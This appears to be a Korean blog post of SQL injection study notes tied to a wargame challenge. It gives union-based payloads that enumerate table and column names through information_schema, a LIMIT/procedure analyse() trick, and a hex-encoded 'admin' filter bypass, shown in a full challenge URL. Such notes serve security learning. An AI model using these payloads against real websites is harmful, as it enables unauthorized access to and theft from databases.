information_schema.tables
데이터베이스의 table 정보를 가지고 있다.
information_schema
http://luckyyowu.tistory.com/22
procedure anaylse()
select * from (table) where id='1' limit 2,1 procedure anaylse()
현재 실행중인 칼럼에 대한 정보를 가져옴
limit으로 칼럼의 몇번째 테이블을 가져올지 설정이 가능하다.
http://tempuss.tistory.com/entry/Limit-%EC%A0%88%EC%97%90%EC%84%9C%EC%9D%98-SQL-Injection
table이름 가져오는 쿼리
select group_concat(table_name),4 from information_schema.tables where table_schema=schema()#
** table에는 user table인 base table이 있고 system전용 테이블이 있다.
따라서 where table_type='base table'을 넣어주면 테이블 찾기가 더 쉽다.
칼럼명 가져오는 쿼리
select 1,2,group_concat(column_name),3 from information_schema.columns where table_name='flag
쿼리 인젝션에 문자열 넣고싶을때
ex) los goblin
https://los.eagle-jump.org/goblin_5559aacf2617d21ebb6efe907b7dded8.php?no=5%20or%20id=0x61646d696e
0x61646d696e처럼 hex로 넣는다
select id from prob_goblin where id='guest' and no=5 or id=0x61646d696e
'웹 > SQL injection' 카테고리의 다른 글
blind sql injection 활용 함수 (0) | 2017.01.31 |
---|---|
sql 필터링 우회기법 (0) | 2017.01.31 |
sqlmap 펌 (0) | 2017.01.29 |
sqlmap post testing (0) | 2017.01.29 |
공격 쿼리 모음 (0) | 2017.01.15 |